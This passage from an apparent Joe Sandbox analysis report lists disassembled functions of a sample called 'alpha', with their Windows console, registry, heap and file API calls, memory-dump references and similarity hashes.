                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1313749407-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 42502806a7cb474f2d1791eeedd5d901f670012d3f9a569917c72d4fe7516a3d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5cfefe1b4f121bdf81259a9be4efe4990351d1693ed8e6e46377aa64f1f384f5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42502806a7cb474f2d1791eeedd5d901f670012d3f9a569917c72d4fe7516a3d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB51E231A0122E9BCF249F659C887BEB3E5FB94314F1451A9EA05E7290EB70DD81EB50
                                                                                                                                                                                                                                                                                                                                                      Function 00F09A7D Relevance: 10.6, APIs: 7, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F09AC2
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 00F09B22
                                                                                                                                                                                                                                                                                                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 00F09B32
                                                                                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 00F09BAD
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00F09BB8
                                                                                                                                                                                                                                                                                                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00F09BCB
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,?), ref: 00F09BF9
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Error$CurrentDirectoryModememset$Last
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1725644760-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4b5201a78133e219b7a12112d927257ede44559467724d05933c31496a717b2e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0c83f91cef796599d3ef06eee1837b69dec3f83334a6b5aa9450c8fd7fdb65ca
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b5201a78133e219b7a12112d927257ede44559467724d05933c31496a717b2e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC41CF71E052189BDF24DBA4EC85BEEB3B4EF58320F008199E805E7291FB749A41EB55
                                                                                                                                                                                                                                                                                                                                                      Function 00EF260E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00EF1775,-00000001,-00000001,-00000001,-00000001), ref: 00EF2650
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EFF339
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00EF1775,-00000001,-00000001,-00000001,-00000001), ref: 00EFF347
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A30,00000001,?,00000104,00000000,?,?,00EF1775,-00000001,-00000001,-00000001,-00000001), ref: 00EFF383
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00EF87F0,?,?,?,00EF87F0,00000000,?,00EE4A0A), ref: 00EFF390
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: _get_osfhandle.MSVCRT ref: 00EEDDA3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EFC050), ref: 00EEDDAD
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: BufferConsoleInfoScreen$Heap_get_osfhandle$AllocFileProcessTypelongjmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: J
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 158340877-201899326
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 116b36d22417efa6cf69dca8d37b752a3fc2ff1131e7a480cac2802184d61807
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 21f4433e35c70c9ad4895ee0f613eb2a6139e5c9507c076323cb17a670d483d5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 116b36d22417efa6cf69dca8d37b752a3fc2ff1131e7a480cac2802184d61807
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F531BC72E003099FD720AF75C845A7EBBF8EF48B16B10482EEA46E6150EB74D801DB50
                                                                                                                                                                                                                                                                                                                                                      Function 00F0B701 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0(00000000,00000000,00000000,00000001), ref: 00F0B717
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00F0B72A
                                                                                                                                                                                                                                                                                                                                                      • RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0(?,?,?), ref: 00F0B7FC
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8235: _get_osfhandle.MSVCRT ref: 00EE824E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EE8256
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8235: _get_osfhandle.MSVCRT ref: 00EE8264
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EE826C
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0B76D
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?), ref: 00F0B788
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console$ModeWindow_get_osfhandle$InitializeUninitializememset
                                                                                                                                                                                                                                                                                                                                                      • String ID: <
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1664749912-4251816714
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b8377c3fbf9c4e9d3e0b7652b65f524d64ad28000836245036e6e4053df65ab0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5a60895c0ad3d4f40fcead51a403839e0909df4cb50ba805483624f11ebbe518
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8377c3fbf9c4e9d3e0b7652b65f524d64ad28000836245036e6e4053df65ab0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD310D75D0020DDFCB11DFA9D885ADEBBF8EF44355F148016E905E3391DB309945AB61
                                                                                                                                                                                                                                                                                                                                                      Function 00EE4D42 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00EE4D66
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00EE4D8A
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00EE4D95
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR$p~]u
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3677997916-4185707875
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0416d6c2d404a48037f945b7aaa3cf94fca18aae77de126fadbd6aedb0a5b661
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b7e43b3b2eb06d522cfbfdbe00c7c40c5dd25e89aef42011c15c234c3a0edd78
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0416d6c2d404a48037f945b7aaa3cf94fca18aae77de126fadbd6aedb0a5b661
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 250131B2E4025CFBDB219B95DC45FDEBBF8EB84750F100156FA11F2180D2709A41EA51
                                                                                                                                                                                                                                                                                                                                                      Function 00EE81EC Relevance: 10.5, APIs: 7, Instructions: 41synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,?,?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EE8203
                                                                                                                                                                                                                                                                                                                                                      • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EE820E
                                                                                                                                                                                                                                                                                                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EE8229
                                                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EFB0AB
                                                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EFB0C1
                                                                                                                                                                                                                                                                                                                                                      • fprintf.MSVCRT ref: 00EFB0D5
                                                                                                                                                                                                                                                                                                                                                      • fflush.MSVCRT ref: 00EFB0E3
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4271573189-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ad09250c6670c5a7759573c622669fa0d0e113e95c7731dfab37682759788053
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c4d062c38c841026664b22bbc47226189ff988cde067c23bf4049a579e67c4cd
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad09250c6670c5a7759573c622669fa0d0e113e95c7731dfab37682759788053
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D01A23000921CFFDB10ABE8ED0EA9A7BADEF05325F144144F115A21F1CBB54A12BB63
                                                                                                                                                                                                                                                                                                                                                      Function 00EF3CD0 Relevance: 9.4, APIs: 6, Instructions: 438COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF3D30
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 00EF3E3D
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,00000000), ref: 00EF3E88
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$FullNamePath
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3158150540-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c0d9055bed37060302b5e1fc5a7834f17e727aa198e3cb207c42caf255015a6d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 18961cea6b25575fe05b761e394bac94b61993189198780cb28e37562f352fdc
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0d9055bed37060302b5e1fc5a7834f17e727aa198e3cb207c42caf255015a6d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4402C535A002199BCB24DF68DC957B9B3B1FF48314F5881E9D90AA7390E735AE82CF54
                                                                                                                                                                                                                                                                                                                                                      Function 00EE498F Relevance: 9.2, APIs: 6, Instructions: 157COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EF858D
                                                                                                                                                                                                                                                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EF8595
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 00EF85D4
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EF85ED
                                                                                                                                                                                                                                                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EF85F5
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1066134489-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 926aaccc232157e1f709a504026c1d323824e2fca760af692a934ddb172ab722
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 55089dcddd8b5baaef0d8624b4b9af8b1c132b43b029427074bf9aa9964d23bc
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 926aaccc232157e1f709a504026c1d323824e2fca760af692a934ddb172ab722
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E841D471A002099BDF28DF79DD89ABEB3A4EB40308F155469EA46FB1C6EE70DD01CA51
                                                                                                                                                                                                                                                                                                                                                      Function 00EEB7A8 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _tell.MSVCRT ref: 00EEB7F9
                                                                                                                                                                                                                                                                                                                                                      • _close.MSVCRT ref: 00EEB82C
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EEB8CC
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00EEB936
                                                                                                                                                                                                                                                                                                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00F1C9F0), ref: 00EEB947
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EEB96D
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ConsoleInfoOutput_close_tellmemset
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1380661413-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4df18d85fe0d71ddf14ac3e97fa1c49970fa8e7b406d5ab8c4452ac3c8f077a1
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9b2510b8cdee8d3a7d04ed07b9898490e5cd02edb92a638014b2847b2f6ba517
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4df18d85fe0d71ddf14ac3e97fa1c49970fa8e7b406d5ab8c4452ac3c8f077a1
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F641E670A0038C8BDB34DF29D84836BB7E5AB84318F24692CE995B72A1D730DC45CB52
                                                                                                                                                                                                                                                                                                                                                      Function 00EE7F47 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE7F7C
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000001), ref: 00EE7FC0
                                                                                                                                                                                                                                                                                                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00EE7FF3
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,00000001), ref: 00EE800C
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EFB05A
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$DriveInformationTypeVolume
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 285405857-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: bea1164e48a24c48f3ffc4131b80514b1fe758536f2dae22eb469eb573b31b56
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9f22d3e6776cc931ad57dc7c8d9f7dacd1ec6688228d5b05a1a43e551ac9dd3e
